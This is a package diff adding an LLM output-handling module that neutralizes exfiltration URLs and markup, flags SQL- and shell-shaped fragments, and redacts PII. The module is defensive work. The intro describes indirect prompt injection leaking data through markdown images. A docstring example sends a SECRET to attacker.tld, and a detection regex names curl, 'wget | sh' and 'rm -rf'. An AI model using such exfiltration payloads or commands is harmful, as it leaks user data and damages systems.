@blamejs/core 0.14.10 → 0.14.11

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
@@ -0,0 +1,463 @@
1
+ "use strict";
2
+ /**
3
+ * @module b.ai.output
4
+ * @nav AI
5
+ * @title AI Output Handling
6
+ *
7
+ * @intro
8
+ * Treats LLM output as untrusted, attacker-influenceable data before
9
+ * it reaches a browser, a downstream fetcher, a SQL / command sink, or
10
+ * a log. The input gate (b.ai.input.classify) defends the prompt going
11
+ * in; this defends the model's response coming out. OWASP LLM05:2025
12
+ * (Improper Output Handling) and LLM02:2025 (Sensitive Information
13
+ * Disclosure). Under RAG / tool / agentic contexts indirect prompt
14
+ * injection (OWASP LLM01:2025) routes attacker text from a retrieved
15
+ * document or web page THROUGH the model and out into the response, so
16
+ * a "trusted" model is still an attacker-controlled channel — output
17
+ * handling is defense in depth that never assumes the input gate
18
+ * caught everything.
19
+ *
20
+ * `sanitize(text, opts)` neutralizes active markup via b.guardHtml,
21
+ * gates every markdown image / link and HTML src / href URL through
22
+ * b.safeUrl + b.ssrfGuard (the EchoLeak markdown-image exfiltration
23
+ * class, CVE-2025-32711), and FLAGS SQL- / command-shaped fragments
24
+ * rather than silently repairing them. `redact(text, opts)` strips PII
25
+ * and secret disclosures via b.redact's detector chain plus an
26
+ * entity-selectable pass. Both treat the model response as hostile by
27
+ * default; sanitize is best-effort per the guard-family KIND
28
+ * discipline (refuse / flag over repair for executable sinks).
29
+ *
30
+ * @card
31
+ * LLM output handling — neutralizes XSS / DOM injection, gates markdown-image and link URLs against SSRF / EchoLeak exfiltration, flags SQL- / command-shaped fragments, and redacts PII / secret disclosures before model output is rendered, fetched, or logged. OWASP LLM05:2025 + LLM02:2025.
32
+ */
33
+
34
+ var net = require("node:net");
35
+
36
+ var C = require("./constants");
37
+ var numericBounds = require("./numeric-bounds");
38
+ var audit = require("./audit");
39
+ var guardHtml = require("./guard-html");
40
+ var safeUrl = require("./safe-url");
41
+ var ssrfGuard = require("./ssrf-guard");
42
+ var redact = require("./redact");
43
+ var safeSql = require("./safe-sql");
44
+ var { AiOutputError } = require("./framework-error");
45
+
46
+ var SAMPLE_TRUNC = 80; // sample truncation length in chars, not bytes
47
+ var DEFAULT_MAX_BYTES = C.BYTES.kib(64);
48
+
49
+ // Neutral placeholder substituted for a dropped URL in markdown / HTML.
50
+ // Renders inert in every sink (browser, markdown renderer, link
51
+ // preview) — about:blank is the canonical inert navigation target.
52
+ var NEUTRALIZED_URL = "about:blank#blocked";
53
+
54
+ // Markdown image (![alt](url)) and link ([text](url)) URL extractors.
55
+ // The capture group is the raw URL token — everything up to the first
56
+ // whitespace or ")". Bracket and whitespace runs are length-bounded so
57
+ // the extractor is linear-time (no polynomial backtracking) on hostile
58
+ // model output; the closing ")" / optional "title" are intentionally not
59
+ // matched (we only need the URL to gate it). Reference-style definitions
60
+ // ([id]: url) are caught by the third pattern so EchoLeak reference-link
61
+ // payloads don't slip past.
62
+ var MD_IMAGE_RE = /!\[[^\]]{0,2048}\]\(\s{0,256}([^)\s]+)/g;
63
+ var MD_LINK_RE = /(?<!!)\[[^\]]{0,2048}\]\(\s{0,256}([^)\s]+)/g;
64
+ var MD_REF_RE = /^[ \t]{0,3}\[[^\]]+\]:\s*(\S+)/gm;
65
+ // HTML src= / href= attribute URL extractor — the guardHtml pass already
66
+ // strips dangerous markup, but a surviving same-origin-looking src that
67
+ // points at an internal / metadata host must still be neutralized for
68
+ // the auto-fetch exfiltration class.
69
+ var HTML_URL_ATTR_RE = /\b(?:src|href)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^"'>\s]+))/gi;
70
+
71
+ // SQL-shaped fragment signal. Composes safe-sql's reserved-word stance:
72
+ // a leading SQL keyword followed by a clause keyword is the executable
73
+ // shape, and each candidate keyword is confirmed against
74
+ // safeSql.validateIdentifier (which REFUSES reserved words — a word that
75
+ // throws there is a SQL reserved word, not a plain identifier). We FLAG,
76
+ // never repair — a sanitized-but-still-executed query is a false sense
77
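+ // of safety; the v1 posture is flag-and-let-the-operator-refuse.
+ // NOTE(review): the trailing \b also applies to the `--` and `;`
+ // alternatives, so they only match when a word character sits directly
+ // on both sides (e.g. "a;b"); "x; y" or a trailing ";" will not match —
+ // confirm this is intended.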
78
+ var SQL_SHAPE_RE = /\b([A-Za-z]+)\b[\s\S]{0,40}\b(?:from|into|table|where|set|values|database|schema|--|;)\b/i;
79
+ // Command-shaped fragment: shell metacharacters around a binary, or an
80
+ // inline substitution / pipe-to-shell shape. Flag-only, same posture.
81
+ var CMD_SHAPE_RE = /(?:\$\(|`|\|\s*(?:sh|bash|zsh|cmd|powershell)\b|;\s*rm\s+-rf?\b|&&\s*curl\b|\bwget\b[\s\S]{0,40}\|\s*(?:sh|bash)\b)/i;
82
+
83
// Reserved-word probe. Delegates to safeSql.validateIdentifier so the
// keyword list stays owned by safe-sql: the word counts as reserved (or
// otherwise unsafe as an identifier) exactly when the validator throws.
// Returns true on refusal, false when the validator accepts the word.
function _isSqlReservedWord(word) {
  var refused = false;
  try {
    safeSql.validateIdentifier(word);
  } catch (_err) {
    // Any throw from the validator is treated as "reserved / unsafe".
    refused = true;
  }
  return refused;
}
95
+
96
// Detect a SQL-executable shape: a leading word that the safe-sql
// validator refuses (see _isSqlReservedWord), followed within the
// SQL_SHAPE_RE window by a clause keyword. Returns the matched fragment
// or null.
//
// SQL_SHAPE_RE.exec alone only reports the LEFTMOST match, whose leading
// word is usually ordinary prose ("Sure, run DROP TABLE users" matches
// starting at "Sure"), so a single exec would miss SQL that is preceded
// by any other word. Instead every alphabetic word is considered as a
// candidate verb: reserved words are re-checked with a sticky copy of
// SQL_SHAPE_RE anchored at that word. When the leftmost match already
// starts at a reserved word the result is identical to a single exec.
// NOTE(review): how many everyday words the validator refuses is not
// visible from here — confirm the flag rate on prose is acceptable.
function _detectSqlShape(text) {
  var anchoredFlags = SQL_SHAPE_RE.flags.replace(/[gy]/g, "") + "y";
  var anchored = new RegExp(SQL_SHAPE_RE.source, anchoredFlags);
  var wordRe = /[A-Za-z]+/g;
  var word;
  while ((word = wordRe.exec(text)) !== null) {
    if (!_isSqlReservedWord(word[0])) continue;
    // Sticky match: the shape must start exactly at this candidate word.
    anchored.lastIndex = word.index;
    var m = anchored.exec(text);
    if (m) return m[0];
  }
  return null;
}
104
+
105
+ // Entity → redact.js CLASSIFIER_PATTERNS subset for redact(). The
106
+ // operator picks entities (email / phone / ssn / pan / …); we map them
107
+ // onto redact.js's owned detector chain rather than re-deriving Luhn /
108
+ // SSN / PAN / JWT regexes here.
109
+ var ENTITY_PATTERNS = Object.freeze({
110
+ "pan": ["pan"],
111
+ "ssn": ["ssn"],
112
+ "ein": ["ein"],
113
+ "iban": ["iban"],
114
+ "jwt": ["jwt"],
115
+ "aws": ["aws-access-key"],
116
+ "phi": ["phi-shape"],
117
+ // email / phone aren't in redact's CLASSIFIER_PATTERNS (they're
118
+ // value-detector territory); handled below via dedicated shape rules
119
+ // that compose redact's MARKER so the placeholder is uniform.
120
+ "email": [],
121
+ "phone": [],
122
+ });
123
+
124
+ // Email / phone shape rules — applied as in-string replacements so a
125
+ // disclosure embedded mid-sentence in model prose is scrubbed, not just
126
+ // a whole-field match. Marker is redact.js's MARKER for uniformity.
127
+ var EMAIL_RE = /\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}\b/g;
128
+ var PHONE_RE = /(?:\+?\d{1,3}[\s.-]?)?(?:\(\d{2,4}\)[\s.-]?)?\d{3}[\s.-]?\d{3,4}\b/g;
129
+
130
// Cheap shape features of the (already sanitized) text: its length in
// UTF-16 code units and the number of "\n"-separated lines.
function _featuresOf(text) {
  var lineCount = text.split("\n").length;
  return { length: text.length, lines: lineCount };
}
136
+
137
// Walk a global regex whose URL capture (group 1, 2 or 3) is the LAST
// thing in the match apart from an optional closing quote; call
// onUrl(url) for each match and, when onUrl returns a different string,
// splice that string in place of the URL. Returns the possibly-rewritten
// text (the original string when nothing was replaced).
//
// text  — string to scan
// re    — RegExp with the `g` flag; its lastIndex is reset here
// onUrl — function(url) → replacement string, or null to keep the URL
function _rewriteUrls(text, re, onUrl) {
  re.lastIndex = 0;
  var out = "";
  var last = 0;
  var m;
  while ((m = re.exec(text)) !== null) {
    // Zero-width guard runs first so no `continue` below can skip it.
    if (re.lastIndex === m.index) re.lastIndex += 1;
    var url = m[1] || m[2] || m[3];
    if (!url) continue;
    var replacement = onUrl(url);
    if (typeof replacement !== "string" || replacement === url) continue;
    // Locate the capture from the END of the match. The same text can
    // appear earlier in the match (markdown alt text equal to the URL,
    // href="href"), and indexOf would then rewrite that earlier copy and
    // leave the real URL in place.
    var idx = m.index + m[0].lastIndexOf(url);
    out += text.slice(last, idx) + replacement;
    last = idx + url.length;
  }
  return last === 0 ? text : out + text.slice(last);
}
158
+
159
// Verdict for one URL pulled out of model output. Two synchronous gates:
//   1. safeUrl.parse with allowedProtocols = safeUrl.ALLOW_HTTP_TLS — any
//      throw is reported as "scheme-or-credential-refused".
//   2. When the parsed hostname (IPv6 brackets stripped) is an IP
//      literal, ssrfGuard.classify — any non-null class is reported as
//      "ssrf-<class>".
// Hostnames that are not IP literals are kept: no DNS resolution happens
// here, so resolving and pinning is left to the downstream fetcher.
// Returns { keep: bool, reason: string|null }.
function _urlVerdict(url) {
  var parsed;
  try {
    parsed = safeUrl.parse(url, { allowedProtocols: safeUrl.ALLOW_HTTP_TLS });
  } catch (_err) {
    return { keep: false, reason: "scheme-or-credential-refused" };
  }

  var bareHost = (parsed.hostname || "").replace(/^\[|\]$/g, "");
  var isIpLiteral = Boolean(bareHost) && net.isIP(bareHost) !== 0;
  var rangeClass = isIpLiteral ? ssrfGuard.classify(bareHost) : null;
  if (rangeClass !== null) {
    return { keep: false, reason: "ssrf-" + rangeClass };
  }
  return { keep: true, reason: null };
}
184
+
185
+ /**
186
+ * @primitive b.ai.output.sanitize
187
+ * @signature b.ai.output.sanitize(text, opts?)
188
+ * @since 0.14.11
189
+ * @status stable
190
+ * @compliance gdpr, soc2
191
+ * @related b.ai.output.redact, b.ai.input.classify, b.guardHtml.sanitize, b.ssrfGuard.classify, b.safeUrl.parse
192
+ *
193
+ * Treat an LLM response as untrusted output and neutralize the four
194
+ * sink-injection classes before it is rendered, fetched, or executed.
195
+ * Active markup (script / event-handlers / dangerous URL schemes) is
196
+ * stripped via `b.guardHtml.sanitize`; every markdown image / link and
197
+ * HTML `src` / `href` URL is gated through `b.safeUrl.parse` (scheme +
198
+ * credential) and `b.ssrfGuard.classify` (IP-range), so auto-fetch URLs
199
+ * to attacker or internal / cloud-metadata hosts are neutralized — the
200
+ * EchoLeak zero-click markdown-image exfiltration class
201
+ * ([CVE-2025-32711](https://nvd.nist.gov/vuln/detail/CVE-2025-32711),
202
+ * CVSS 9.3). SQL- and command-shaped fragments are FLAGGED, never
203
+ * repaired (a sanitized-but-executed query is a false sense of safety —
204
+ * sanitize is best-effort per the guard-family discipline). Returns
205
+ * `{ text, verdict, signals, features }` where `text` is the sanitized
206
+ * output, `verdict` is `clean` / `sanitized` / `flagged`, and `signals`
207
+ * lists each neutralization or flag. OWASP LLM05:2025.
208
+ *
209
+ * @opts
210
+ * maxBytes: number, // default 64 KiB; throws on overflow
211
+ * htmlProfile: string, // b.guardHtml profile; default "strict"
212
+ * sqlShape: boolean, // flag SQL-shaped fragments; default true
213
+ * commandShape: boolean, // flag command-shaped fragments; default true
214
+ * audit: boolean, // default true; emit aioutput.sanitize on non-clean
215
+ * errorClass: ErrorClass, // override the thrown class on bad input
216
+ *
217
+ * @example
218
+ * var out = b.ai.output.sanitize(
219
+ * "Here you go ![x](https://attacker.tld/?s=SECRET) <script>steal()</script>");
220
+ * out.verdict; // → "sanitized"
221
+ * out.text.indexOf("<script>"); // → -1
222
+ * out.signals.some(function (s) { return s.id === "url-neutralized"; }); // → true
223
+ */
224
function sanitize(text, opts) {
  opts = opts || {};
  var errorClass = opts.errorClass || AiOutputError;
  numericBounds.requirePositiveFiniteIntIfPresent(opts.maxBytes, "aiOutput.sanitize: opts.maxBytes", errorClass, "BAD_MAX_BYTES");
  var byteCap = opts.maxBytes || DEFAULT_MAX_BYTES;
  var emitAudit = opts.audit !== false;
  var profile = typeof opts.htmlProfile === "string" ? opts.htmlProfile : "strict";
  var flagSql = opts.sqlShape !== false;
  var flagCommand = opts.commandShape !== false;

  // Input contract: a string no larger than byteCap UTF-8 bytes.
  if (typeof text !== "string") {
    throw errorClass.factory("ai-output/bad-input",
      "aiOutput.sanitize: text must be a string");
  }
  var size = Buffer.byteLength(text, "utf8");
  if (size > byteCap) {
    throw errorClass.factory("ai-output/output-too-large",
      "aiOutput.sanitize: output exceeds " + byteCap + " bytes (got " + size + ")");
  }

  var signals = [];

  // Step 1 — URL gate, run before the HTML rewrite. Each refused URL is
  // recorded as a severity-3 signal and swapped for NEUTRALIZED_URL.
  var gate = function (url) {
    var verdictForUrl = _urlVerdict(url);
    if (verdictForUrl.keep) return null;
    signals.push({ id: "url-neutralized", severity: 3, sample: url.slice(0, SAMPLE_TRUNC), reason: verdictForUrl.reason });
    return NEUTRALIZED_URL;
  };
  // Extractors run in a fixed order: image, inline link, reference
  // definition, then HTML src / href attributes.
  var out = [MD_IMAGE_RE, MD_LINK_RE, MD_REF_RE, HTML_URL_ATTR_RE].reduce(function (acc, re) {
    return _rewriteUrls(acc, re, gate);
  }, text);

  // Step 2 — active-markup pass through guardHtml; any change to the
  // text counts as one severity-3 "html-neutralized" signal.
  var cleaned = guardHtml.sanitize(out, { profile: profile });
  if (cleaned !== out) {
    signals.push({ id: "html-neutralized", severity: 3, sample: null });
  }
  out = cleaned;

  // Step 3 — SQL- / command-shaped fragments are flagged (severity 2);
  // the text itself is not modified by these checks.
  if (flagSql) {
    var sqlFragment = _detectSqlShape(out);
    if (sqlFragment) {
      signals.push({ id: "sql-shape-flagged", severity: 2, sample: sqlFragment.slice(0, SAMPLE_TRUNC) });
    }
  }
  if (flagCommand) {
    var cmdHit = CMD_SHAPE_RE.exec(out); // allow:regex-no-length-cap — `out` is byte-bounded to maxBytes (64 KiB default) at function entry; this is a flag-only signal, not a format validator
    if (cmdHit) {
      signals.push({ id: "command-shape-flagged", severity: 2, sample: cmdHit[0].slice(0, SAMPLE_TRUNC) });
    }
  }

  // Verdict: "sanitized" when any severity-3 (mutating) signal fired,
  // "flagged" when only flag signals fired, "clean" when none did.
  var mutated = signals.some(function (s) { return s.severity === 3; });
  var verdict = "clean";
  if (mutated) {
    verdict = "sanitized";
  } else if (signals.length > 0) {
    verdict = "flagged";
  }

  if (emitAudit && verdict !== "clean") {
    audit.safeEmit({
      action: "aioutput.sanitize",
      outcome: "success",
      metadata: {
        verdict: verdict,
        signalIds: signals.map(function (s) { return s.id; }),
        length: out.length,
      },
    });
  }

  return {
    text: out,
    verdict: verdict,
    signals: signals,
    features: _featuresOf(out),
  };
}
310
+
311
+ /**
312
+ * @primitive b.ai.output.redact
313
+ * @signature b.ai.output.redact(text, opts?)
314
+ * @since 0.14.11
315
+ * @status stable
316
+ * @compliance gdpr, soc2, hipaa, pci-dss
317
+ * @related b.ai.output.sanitize, b.redact.redact, b.redact.classifyDefaults
318
+ *
319
+ * Strip PII and secret disclosures from an LLM response before it is
320
+ * logged, returned, or rendered — the model regurgitates training-data
321
+ * PII, echoes secrets pulled into context, or leaks other-tenant /
322
+ * system-prompt content (OWASP LLM02:2025 Sensitive Information
323
+ * Disclosure; NIST AI 600-1 Data Privacy + Information Security). The
324
+ * always-on secret pass composes `b.redact.redact` — Luhn-validated
325
+ * PAN, JWS triplets, PEM / OpenSSH private keys, AWS key prefixes,
326
+ * vault-sealed ciphertext, connection-string credentials. The
327
+ * entity-selectable PII pass (`opts.entities`) maps onto
328
+ * `b.redact.CLASSIFIER_PATTERNS` for `pan` / `ssn` / `ein` / `iban` /
329
+ * `jwt` / `aws` / `phi`, plus in-string `email` / `phone` shape rules,
330
+ * all substituting the framework marker. Returns
331
+ * `{ text, redacted, hits }` where `text` is the scrubbed output,
332
+ * `redacted` is whether anything changed, and `hits` lists each entity
333
+ * class that fired. Never mutates the input.
334
+ *
335
+ * @opts
336
+ * entities: string[], // subset of: pan, ssn, ein, iban, jwt, aws, phi, email, phone
337
+ * secrets: boolean, // run the always-on b.redact secret pass; default true
338
+ * marker: string, // replacement marker; default b.redact.MARKER
339
+ * maxBytes: number, // default 64 KiB; throws on overflow
340
+ * audit: boolean, // default true; emit aioutput.redact when hits fire
341
+ * errorClass: ErrorClass, // override the thrown class on bad input
342
+ *
343
+ * @example
344
+ * var out = b.ai.output.redact(
345
+ * "Contact alice@corp.example or card 4111 1111 1111 1111",
346
+ * { entities: ["email", "pan"] });
347
+ * out.redacted; // → true
348
+ * out.hits; // → ["email", "pan"]
349
+ * out.text; // → "Contact [REDACTED] or card [REDACTED]"
350
+ */
351
function redactOutput(text, opts) {
  opts = opts || {};
  var errorClass = opts.errorClass || AiOutputError;
  numericBounds.requirePositiveFiniteIntIfPresent(opts.maxBytes, "aiOutput.redact: opts.maxBytes", errorClass, "BAD_MAX_BYTES");
  var maxBytes = opts.maxBytes || DEFAULT_MAX_BYTES;
  var auditOn = opts.audit !== false;
  var marker = typeof opts.marker === "string" && opts.marker.length > 0 ? opts.marker : redact.MARKER;
  var runSecrets = opts.secrets !== false;

  if (typeof text !== "string") {
    throw errorClass.factory("ai-output/bad-input",
      "aiOutput.redact: text must be a string");
  }
  var byteLen = Buffer.byteLength(text, "utf8");
  if (byteLen > maxBytes) {
    throw errorClass.factory("ai-output/output-too-large",
      "aiOutput.redact: output exceeds " + maxBytes + " bytes (got " + byteLen + ")");
  }

  // Every requested entity must be a known ENTITY_PATTERNS key; a
  // non-array opts.entities is treated as "no entities".
  var entities = Array.isArray(opts.entities) ? opts.entities : [];
  for (var e = 0; e < entities.length; e += 1) {
    if (typeof entities[e] !== "string" || !Object.prototype.hasOwnProperty.call(ENTITY_PATTERNS, entities[e])) {
      throw errorClass.factory("ai-output/unknown-entity",
        "aiOutput.redact: unknown entity '" + entities[e] +
        "'. Known: " + Object.keys(ENTITY_PATTERNS).join(", "));
    }
  }

  var hits = [];
  var out = text;

  // Always-on secret pass — delegated to b.redact.redact with the chosen
  // marker. A "secrets" hit is recorded only when a string came back AND
  // it differs from the input, so a non-string return can never report a
  // redaction that did not happen.
  if (runSecrets) {
    var scrubbed = redact.redact(out, { marker: marker });
    if (typeof scrubbed === "string" && scrubbed !== out) {
      hits.push("secrets");
      out = scrubbed;
    }
  }

  // The marker is substituted through a replacer FUNCTION, never as a
  // replacement string: String.prototype.replace expands `$&`, `$1`,
  // `` $` `` … inside replacement strings, so an operator marker such as
  // "[$&]" would otherwise write the matched email / phone straight back
  // into the output. The replacer also records that a match occurred.
  var shapeMatched = false;
  function _emitMarker() {
    shapeMatched = true;
    return marker;
  }

  // Entity-selectable PII pass. CLASSIFIER_PATTERNS-backed entities run
  // the pattern's detect() over the whole string and, on a hit, scrub the
  // matched shape via _scrubEntity; email / phone run their in-string
  // shape rules.
  for (var i = 0; i < entities.length; i += 1) {
    var ent = entities[i];
    var fired = false;
    var patternNames = ENTITY_PATTERNS[ent];
    for (var p = 0; p < patternNames.length; p += 1) {
      var spec = redact.CLASSIFIER_PATTERNS[patternNames[p]];
      if (spec && spec.detect(out)) {
        out = _scrubEntity(out, patternNames[p], marker);
        fired = true;
      }
    }
    var shapeRe = null;
    if (ent === "email") {
      shapeRe = EMAIL_RE;
    } else if (ent === "phone") {
      shapeRe = PHONE_RE;
    }
    if (shapeRe !== null) {
      shapeMatched = false;
      out = out.replace(shapeRe, _emitMarker); // allow:regex-no-length-cap — `out` byte-bounded to maxBytes at entry; in-string scrub, not a format validator
      if (shapeMatched) fired = true;
    }
    if (fired) hits.push(ent);
  }

  if (auditOn && hits.length > 0) {
    audit.safeEmit({
      action: "aioutput.redact",
      outcome: "success",
      metadata: { hits: hits, length: out.length },
    });
  }

  return {
    text: out,
    redacted: hits.length > 0,
    hits: hits,
  };
}
427
+
428
// In-string scrub for a CLASSIFIER_PATTERNS-backed entity: replaces every
// occurrence of the entity's shape inside `str` with `marker`, so a
// disclosure embedded mid-prose is scrubbed.
//
// str         — text to scrub
// patternName — "pan" | "iban" | "ssn" | "ein" | "jwt" | "aws-access-key"
//               | "phi-shape"; any other name returns `str` unchanged
// marker      — literal replacement text
//
// The marker is emitted through a replacer function rather than passed
// as a replacement string: String.prototype.replace expands `$&`, `$1`,
// `$$` … inside replacement strings, so a marker like "[$&]" would
// otherwise re-insert the very value being redacted.
function _scrubEntity(str, patternName, marker) {
  var emit = function () { return marker; };
  switch (patternName) {
    case "pan":
    case "iban":
      // Both names share one branch: the 13–19 digit card-number run and
      // the IBAN shape (two letters, two digits, 11–30 alphanumerics) are
      // scrubbed for either name. No checksum is applied here.
      return str.replace(/\b\d{4}[\s-]?\d{4}[\s-]?\d{4}[\s-]?\d{1,7}\b/g, emit)
        .replace(/\b[A-Z]{2}\d{2}[A-Z0-9]{11,30}\b/g, emit);
    case "ssn":
      return str.replace(/\b\d{3}-\d{2}-\d{4}\b/g, emit);
    case "ein":
      return str.replace(/\b\d{2}-\d{7}\b/g, emit);
    case "jwt":
      return str.replace(/\beyJ[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+\b/g, emit);
    case "aws-access-key":
      return str.replace(/\b(?:AKIA|ASIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASCA)[A-Z0-9]{16}\b/g, emit);
    case "phi-shape":
      // SSN-shaped runs plus "MRN" followed by 4–12 digits.
      return str.replace(/\b\d{3}-\d{2}-\d{4}\b/g, emit)
        .replace(/\bMRN[:#]?\s*\d{4,12}\b/gi, emit);
    default:
      return str;
  }
}
457
+
458
+ module.exports = {
459
+ sanitize: sanitize,
460
+ redact: redactOutput,
461
+ ENTITIES: Object.freeze(Object.keys(ENTITY_PATTERNS)),
462
+ AiOutputError: AiOutputError,
463
+ };